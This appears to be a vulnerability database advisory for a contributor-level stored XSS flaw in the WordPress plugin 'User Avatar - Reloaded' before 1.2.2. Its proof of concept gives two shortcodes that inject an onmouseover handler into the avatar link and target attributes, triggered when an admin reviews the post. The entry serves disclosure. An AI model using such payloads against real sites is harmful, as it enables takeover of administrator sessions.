WordPress Plugin Vulnerabilities
User Avatar - Reloaded < 1.2.2 - Contributor+ Stored XSS
Description
The plugin does not properly sanitize and escape certain of its shortcodes attributes, which could allow relatively low-privileged users like contributors to conduct Stored XSS attacks.
Proof of Concept
As a Contributor+ create a new post and add one of the following shortcode. [avatar user="admin" size="96" align="left" link='" onmouseover="alert(/XSS/)"' /] [avatar user="admin" size="96" align="left" link="/" target='" onmouseover="alert(/XSS/)"' /] Save it to be reviewed. When an admin reviews the post and moves the mouse over the added code, the payload will be delivered.
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Dmitrii Ignatyev
Submitter
Dmitrii Ignatyev
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-09-25 (about 7 months ago)
Added
2023-09-25 (about 7 months ago)
Last Updated
2023-09-26 (about 7 months ago)